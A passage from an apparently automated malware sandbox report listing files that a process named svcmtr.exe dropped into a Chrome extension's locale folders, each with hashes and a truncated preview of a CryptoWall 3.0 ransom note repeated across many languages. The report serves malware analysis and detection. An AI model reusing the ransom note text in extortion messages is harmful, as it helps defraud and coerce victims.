                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\kk\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\km\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\km\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\kn\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\kn\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ko\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ko\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\lo\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\lo\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\lt\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\lt\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\lv\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\lv\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ml\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ml\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
